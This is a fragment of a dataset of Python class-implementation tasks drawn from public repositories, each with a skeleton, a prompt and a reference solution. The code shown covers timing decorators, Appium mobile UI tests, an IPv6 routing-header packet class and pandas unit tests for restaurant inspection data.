"data/stack_v2_sparse_classes_30k", "solution": "class Decorators:\n def decor0(self, func):\n \"\"\"декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n def wrapper(*arg):\n t1 = time.clock()\n res = func(*arg)\n t2 = time.clock()\n print('%0.3fms' % ((t2 - t1) * 1000.0))\n return res\n return wrapper\n\n def decor1(self, f):\n \"\"\"декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n @wraps(f)\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n print('Time for func {} is {}'.format(f.__name__, time_end - time_start))\n print('The', f.__name__, 'result is: ', result)\n return result\n return wrapp\n\n def decor2(self, f):\n \"\"\"декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл\"\"\"\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n with open('decor_data.txt', 'w') as fl:\n fl.write(' Func name is: {}\\n Work time is: {}\\n Args, kwargs are: {}\\n The result: {}'.format(f.__name__, time_end - time_start, str(*args) + ', ' + str(kwargs), result))\n return result\n return wrapp\n\n def decor3(self, f):\n \"\"\"декоратор, проверяющий типы, переданных декорируемой функции, аргументов\"\"\"\n @wraps(f)\n def wrapp(*args, **kwargs):\n result = f(*args, **kwargs)\n print(*args)\n print('Type of args, values for func {} are args: {},\\n values:{}'.format(f.__name__, type(*args), [type(v) for v in kwargs.values()]))\n return result\n return wrapp\n\n def decor4(self, f):\n \"\"\"декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции\"\"\"\n @wraps(f)\n def wrapp(*args, **kwargs):\n if wrapp.value is False:\n print(f.__name__ + ' исполняется')\n f(*args, **kwargs)\n print(f.__name__ + ' была исполнена')\n wrapp.value = True\n return 
wrapp.value\n return print(\"It's already finished\")\n wrapp.value = False\n return wrapp\n", "source": "the_stack_v2_python_sparse", "source_path": "Homework11-20+22.03/Task0(decors).py", "source_repo": "Twicer/Homeworks", "split": "test", "star_events_count": 0} {"blob_id": "4b323c5f1d3b122b148d45dca3e59db54a99cb52", "bodies": ["try:\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/rl_user_wallet_container', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n unittest_TestResult = True\nexcept:\n unittest_TestResult = False\nfinally:\n return unittest_TestResult", "Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\nPublic_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\nPublic_Page.NomalTest(driver, title='余额说明', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_yue_shuoming_tv', Wait_Element='.modules.help.view.activities.HelpActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\nPublic_Page.NomalTest(driver, title='余额充值', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_qu_chongzhi_btn', Wait_Element='.modules.wallet.views.activitys.MyWalletYuEChongzhiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\ndriver.wait_activity('.modules.wallet.views.activitys.MyWalletActivity', 30)\ntime.sleep(2)\ndriver.swipe(500, 1700, 500, 1000)\ntime.sleep(2)\ndriver.swipe(500, 1700, 500, 1000)\nPublic_Page.NomalTest(driver, title='更多明细', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_more_mingxi_tv', Wait_Element='.modules.wallet.views.activitys.MyWalletMoreMingxiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\nhuadong.shanghua(driver, 1000)\ntime.sleep(3)\nhuadong.shanghua(driver, 1000)\ntime.sleep(3)\nhuadong.shanghua(driver, 1000)\ntime.sleep(3)\ndriver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\ntime.sleep(2)\ndriver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()"], "bodies_text": "<|body_start_0|>\n try:\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', 
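Reviewer note on the Decorators record above: `time.clock()` was removed in Python 3.8, and `decor4` only records *that* the function ran — it never stores the result, so it is a run-once guard rather than a cache, returning True or None instead of the wrapped value. A hedged Python 3 sketch of both ideas:

import time
from functools import wraps

def timed(f):
    # Python 3 replacement for the record's time.clock() timing pattern.
    @wraps(f)
    def wrapper(*args, **kwargs):
        t0 = time.perf_counter()
        result = f(*args, **kwargs)
        print('%0.3fms' % ((time.perf_counter() - t0) * 1000.0))
        return result
    return wrapper

def cached_once(f):
    # An actual single-call cache: first result is stored and replayed.
    @wraps(f)
    def wrapper(*args, **kwargs):
        if not wrapper.called:
            wrapper.result = f(*args, **kwargs)
            wrapper.called = True
        return wrapper.result
    wrapper.called = False
    wrapper.result = None
    return wrapper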
find_element_id='com.pujitech.pujiejia:id/rl_user_wallet_container', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n unittest_TestResult = True\n except:\n unittest_TestResult = False\n finally:\n return unittest_TestResult\n<|end_body_0|>\n\n<|body_start_1|>\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n Public_Page.NomalTest(driver, title='余额说明', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_yue_shuoming_tv', Wait_Element='.modules.help.view.activities.HelpActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='余额充值', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_qu_chongzhi_btn', Wait_Element='.modules.wallet.views.activitys.MyWalletYuEChongzhiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n driver.wait_activity('.modules.wallet.views.activitys.MyWalletActivity', 30)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n Public_Page.NomalTest(driver, title='更多明细', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_more_mingxi_tv', Wait_Element='.modules.wallet.views.activitys.MyWalletMoreMingxiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n time.sleep(2)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MyTorrent", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MyTorrent:\n\n def MyTorrent(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n <|body_0|>\n\n def IntoPurse(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/rl_user_wallet_container', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n unittest_TestResult = True\n except:\n unittest_TestResult = False\n finally:\n return unittest_TestResult\n<|end_body_0|>\n\n<|body_start_1|>\n Public_Page.NomalTest(driver, 
title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n Public_Page.NomalTest(driver, title='余额说明', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_yue_shuoming_tv', Wait_Element='.modules.help.view.activities.HelpActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='余额充值', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_qu_chongzhi_btn', Wait_Element='.modules.wallet.views.activitys.MyWalletYuEChongzhiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n driver.wait_activity('.modules.wallet.views.activitys.MyWalletActivity', 30)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n Public_Page.NomalTest(driver, title='更多明细', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_more_mingxi_tv', Wait_Element='.modules.wallet.views.activitys.MyWalletMoreMingxiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n time.sleep(2)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000118", "length_bytes": 4911, "license_type": "no_license", "methods": [{"docstring": "先决条件:进入我家页面 :return: None", "name": "MyTorrent", "signature": "def MyTorrent(driver)"}, {"docstring": "先决条件:进入我家页面 :return: None", "name": "IntoPurse", "signature": "def IntoPurse(driver)"}], "n_methods": 2, "prompt": "Implement the Python class `MyTorrent` described below.\n\nClass description:\nImplement the MyTorrent class.\n\nMethod signatures and docstrings:\n- def MyTorrent(driver): 先决条件:进入我家页面 :return: None\n- def IntoPurse(driver): 先决条件:进入我家页面 :return: None", "prompted_full_text": "Implement the Python class `MyTorrent` described below.\n\nClass description:\nImplement the MyTorrent class.\n\nMethod signatures and docstrings:\n- def MyTorrent(driver): 先决条件:进入我家页面 :return: None\n- def IntoPurse(driver): 先决条件:进入我家页面 :return: None\n\n<|skeleton|>\nclass MyTorrent:\n\n def MyTorrent(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n <|body_0|>\n\n def IntoPurse(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', 
find_element_id='com.pujitech.pujiejia:id/rl_user_wallet_container', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n unittest_TestResult = True\n except:\n unittest_TestResult = False\n finally:\n return unittest_TestResult\n<|end_body_0|>\n\n<|body_start_1|>\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n Public_Page.NomalTest(driver, title='余额说明', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_yue_shuoming_tv', Wait_Element='.modules.help.view.activities.HelpActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='余额充值', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_qu_chongzhi_btn', Wait_Element='.modules.wallet.views.activitys.MyWalletYuEChongzhiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n driver.wait_activity('.modules.wallet.views.activitys.MyWalletActivity', 30)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n Public_Page.NomalTest(driver, title='更多明细', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_more_mingxi_tv', Wait_Element='.modules.wallet.views.activitys.MyWalletMoreMingxiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n time.sleep(2)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n<|end_body_1|>\n", "revision_id": "618a47ea572f8fccfbf10f5f50aff1dfffb7b0e3", "skeleton": "<|skeleton|>\nclass MyTorrent:\n\n def MyTorrent(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n <|body_0|>\n\n def IntoPurse(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MyTorrent:\n def MyTorrent(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n try:\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/rl_user_wallet_container', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n unittest_TestResult = True\n except:\n unittest_TestResult = 
False\n finally:\n return unittest_TestResult\n\n def IntoPurse(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n Public_Page.NomalTest(driver, title='余额说明', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_yue_shuoming_tv', Wait_Element='.modules.help.view.activities.HelpActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='余额充值', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_qu_chongzhi_btn', Wait_Element='.modules.wallet.views.activitys.MyWalletYuEChongzhiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n driver.wait_activity('.modules.wallet.views.activitys.MyWalletActivity', 30)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n Public_Page.NomalTest(driver, title='更多明细', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_more_mingxi_tv', Wait_Element='.modules.wallet.views.activitys.MyWalletMoreMingxiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n time.sleep(2)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n", "source": "the_stack_v2_python_sparse", "source_path": "Appium/Hachi_Android/src/ReleasePage/Case04_MyTorrent.py", "source_repo": "Fengyongming0311/TANUKI", "split": "test", "star_events_count": 0} {"blob_id": "5884c9d06bb9947a11e2247472b18c5c2f5c5815", "bodies": ["next = pcs.Field('next_header', 8)\nlen = pcs.Field('length', 8)\ntype = pcs.Field('type', 8)\nsegments_left = pcs.Field('segments_left', 8)\npcs.Packet.__init__(self, [next, len, type, segments_left], bytes)", "reserved = pcs.Field('reserved', 32, default=0)\nheader = [reserved]\nfor i in range(seg):\n header.append(pcs.StringField('address' + str(i), 128))\npcs.Packet.__add__(self, header)"], "bodies_text": "<|body_start_0|>\n next = pcs.Field('next_header', 8)\n len = pcs.Field('length', 8)\n type = pcs.Field('type', 8)\n segments_left = pcs.Field('segments_left', 8)\n pcs.Packet.__init__(self, [next, len, type, segments_left], bytes)\n<|end_body_0|>\n\n<|body_start_1|>\n reserved = pcs.Field('reserved', 32, default=0)\n header = [reserved]\n for i in range(seg):\n header.append(pcs.StringField('address' + str(i), 128))\n pcs.Packet.__add__(self, header)\n<|end_body_1|>\n", "class_docstring": "A class that contains the IPv6 routing extension-headers.", "class_name": "rthdr", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass rthdr:\n \"\"\"A class that contains the IPv6 
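Reviewer note on the MyTorrent record above: the bare `except:` plus `finally: return` swallows every exception — including KeyboardInterrupt — which makes failed Appium runs indistinguishable from aborted ones. A hedged sketch of a narrower helper, assuming the Appium Python client (which re-exports Selenium's exception types):

from selenium.common.exceptions import NoSuchElementException, TimeoutException

def run_check(driver, check):
    # Narrower variant of the record's try/except/finally-return idiom:
    # only expected UI failures map to False; other errors still surface.
    try:
        check(driver)
    except (NoSuchElementException, TimeoutException):
        return False
    return True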
routing extension-headers.\"\"\"\n\n def __init__(self, bytes=None):\n \"\"\"IPv6 routing extension header from RFC 2460\"\"\"\n <|body_0|>\n\n def rthdr0(self, seg=1, bytes=None):\n \"\"\"IPv6 routing extension header type 0\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n next = pcs.Field('next_header', 8)\n len = pcs.Field('length', 8)\n type = pcs.Field('type', 8)\n segments_left = pcs.Field('segments_left', 8)\n pcs.Packet.__init__(self, [next, len, type, segments_left], bytes)\n<|end_body_0|>\n\n<|body_start_1|>\n reserved = pcs.Field('reserved', 32, default=0)\n header = [reserved]\n for i in range(seg):\n header.append(pcs.StringField('address' + str(i), 128))\n pcs.Packet.__add__(self, header)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000119", "length_bytes": 7919, "license_type": "no_license", "methods": [{"docstring": "IPv6 routing extension header from RFC 2460", "name": "__init__", "signature": "def __init__(self, bytes=None)"}, {"docstring": "IPv6 routing extension header type 0", "name": "rthdr0", "signature": "def rthdr0(self, seg=1, bytes=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004089", "prompt": "Implement the Python class `rthdr` described below.\n\nClass description:\nA class that contains the IPv6 routing extension-headers.\n\nMethod signatures and docstrings:\n- def __init__(self, bytes=None): IPv6 routing extension header from RFC 2460\n- def rthdr0(self, seg=1, bytes=None): IPv6 routing extension header type 0", "prompted_full_text": "Implement the Python class `rthdr` described below.\n\nClass description:\nA class that contains the IPv6 routing extension-headers.\n\nMethod signatures and docstrings:\n- def __init__(self, bytes=None): IPv6 routing extension header from RFC 2460\n- def rthdr0(self, seg=1, bytes=None): IPv6 routing extension header type 0\n\n<|skeleton|>\nclass rthdr:\n \"\"\"A class that contains the IPv6 routing extension-headers.\"\"\"\n\n def __init__(self, bytes=None):\n \"\"\"IPv6 routing extension header from RFC 2460\"\"\"\n <|body_0|>\n\n def rthdr0(self, seg=1, bytes=None):\n \"\"\"IPv6 routing extension header type 0\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n next = pcs.Field('next_header', 8)\n len = pcs.Field('length', 8)\n type = pcs.Field('type', 8)\n segments_left = pcs.Field('segments_left', 8)\n pcs.Packet.__init__(self, [next, len, type, segments_left], bytes)\n<|end_body_0|>\n\n<|body_start_1|>\n reserved = pcs.Field('reserved', 32, default=0)\n header = [reserved]\n for i in range(seg):\n header.append(pcs.StringField('address' + str(i), 128))\n pcs.Packet.__add__(self, header)\n<|end_body_1|>\n", "revision_id": "a070a39586b582fbeea72abf12bbfd812955ad81", "skeleton": "<|skeleton|>\nclass rthdr:\n \"\"\"A class that contains the IPv6 routing extension-headers.\"\"\"\n\n def __init__(self, bytes=None):\n \"\"\"IPv6 routing extension header from RFC 2460\"\"\"\n <|body_0|>\n\n def rthdr0(self, seg=1, bytes=None):\n \"\"\"IPv6 routing extension header type 0\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class rthdr:\n \"\"\"A class that contains the IPv6 routing extension-headers.\"\"\"\n\n def __init__(self, bytes=None):\n \"\"\"IPv6 routing extension header from RFC 2460\"\"\"\n next = pcs.Field('next_header', 8)\n len = pcs.Field('length', 8)\n type = pcs.Field('type', 8)\n segments_left = pcs.Field('segments_left', 8)\n 
pcs.Packet.__init__(self, [next, len, type, segments_left], bytes)\n\n def rthdr0(self, seg=1, bytes=None):\n \"\"\"IPv6 routing extension header type 0\"\"\"\n reserved = pcs.Field('reserved', 32, default=0)\n header = [reserved]\n for i in range(seg):\n header.append(pcs.StringField('address' + str(i), 128))\n pcs.Packet.__add__(self, header)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/pcs/packets/ipv6.py", "source_repo": "bilouro/tcptest", "split": "test", "star_events_count": 0} {"blob_id": "a4254479ee9ae1661f588d95bf8a1a5f8405f8f4", "bodies": ["best_data = {'cuisine_primary': ['thai'], 'restaurant': ['thai garden'], 'boro': ['manhattan'], 'swc_type': ['no cafe'], 'score': [0], 'grade': ['a'], 'inspectiondate': ['1/2/2014']}\nbest_restaurant = pd.DataFrame(best_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\nbest_restaurant['inspectiondate'] = pd.to_datetime(best_restaurant['inspectiondate'], format='%m/%d/%Y')\nbest_restaurant = best_restaurant.set_index('restaurant')\nnpt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[0], best_restaurant)", "worst_data = {'cuisine_primary': ['pizza'], 'restaurant': [\"'za for days\"], 'boro': ['brooklyn'], 'swc_type': ['no cafe'], 'score': [100], 'grade': ['c'], 'inspectiondate': ['3/7/2012']}\nworst_restaurant = pd.DataFrame(worst_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\nworst_restaurant['inspectiondate'] = pd.to_datetime(worst_restaurant['inspectiondate'], format='%m/%d/%Y')\nworst_restaurant = worst_restaurant.set_index('restaurant')\nnpt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[1], worst_restaurant)"], "bodies_text": "<|body_start_0|>\n best_data = {'cuisine_primary': ['thai'], 'restaurant': ['thai garden'], 'boro': ['manhattan'], 'swc_type': ['no cafe'], 'score': [0], 'grade': ['a'], 'inspectiondate': ['1/2/2014']}\n best_restaurant = pd.DataFrame(best_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n best_restaurant['inspectiondate'] = pd.to_datetime(best_restaurant['inspectiondate'], format='%m/%d/%Y')\n best_restaurant = best_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[0], best_restaurant)\n<|end_body_0|>\n\n<|body_start_1|>\n worst_data = {'cuisine_primary': ['pizza'], 'restaurant': [\"'za for days\"], 'boro': ['brooklyn'], 'swc_type': ['no cafe'], 'score': [100], 'grade': ['c'], 'inspectiondate': ['3/7/2012']}\n worst_restaurant = pd.DataFrame(worst_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n worst_restaurant['inspectiondate'] = pd.to_datetime(worst_restaurant['inspectiondate'], format='%m/%d/%Y')\n worst_restaurant = worst_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[1], worst_restaurant)\n<|end_body_1|>\n", "class_docstring": "Check that get_best_and_worst_data returns the DataFrames of the best and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually", "class_name": "GetBestAndWorstDataTests", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GetBestAndWorstDataTests:\n \"\"\"Check that get_best_and_worst_data returns the DataFrames of the best 
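The rthdr record above assembles an RFC 2460 routing header from pcs fields. A short construction sketch under two assumptions: that rthdr subclasses pcs.Packet in the full source (its calls to pcs.Packet.__init__ and pcs.Packet.__add__ only make sense then), and that pcs exposes declared fields as packet attributes, as the Packet Construction Set normally does.

```python
import pcs  # Packet Construction Set, assumed installed; rthdr from the record is in scope

rh = rthdr()          # lays out next_header / length / type / segments_left
rh.next_header = 59   # IPPROTO_NONE: nothing follows this extension header
rh.type = 0           # type-0 routing header
rh.segments_left = 1  # one listed address still to be visited
rh.rthdr0(seg=1)      # append the 32-bit reserved word and one 128-bit address slot
```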
and worst restaurants Note: To check for equality of a tuple (DataFrame, DataFrame), I unpack and check each DataFrame individually\"\"\"\n\n def test_get_best_data(self):\n \"\"\"Test that the function correctly returns the observations of the best restaurant\"\"\"\n <|body_0|>\n\n def test_get_worst_data(self):\n \"\"\"Test that the function correctly returns the observations of the worst restaurant\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n best_data = {'cuisine_primary': ['thai'], 'restaurant': ['thai garden'], 'boro': ['manhattan'], 'swc_type': ['no cafe'], 'score': [0], 'grade': ['a'], 'inspectiondate': ['1/2/2014']}\n best_restaurant = pd.DataFrame(best_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n best_restaurant['inspectiondate'] = pd.to_datetime(best_restaurant['inspectiondate'], format='%m/%d/%Y')\n best_restaurant = best_restaurant.set_index('restaurant')\n npt.assert_array_equal(Visualizer(self.dummy_data).get_best_and_worst_data(1)[0], best_restaurant)\n<|end_body_0|>\n\n<|body_start_1|>\n worst_data = {'cuisine_primary': ['pizza'], 'restaurant': [\"'za for days\"], 'boro': ['brooklyn'], 'swc_type': ['no cafe'], 'score': [100], 'grade': ['c'], 'inspectiondate': ['3/7/2012']}\n worst_restaurant = pd.DataFrame(worst_data, columns=['cuisine_primary', 'restaurant', 'boro', 'swc_type', 'score', 'grade', 'inspectiondate'])\n worst_restaurant['inspectiondate'] = pd.to_datetime(worst_restaurant['inspectiondate'], format='%m/%d/%Y')\n worst_restaurant = 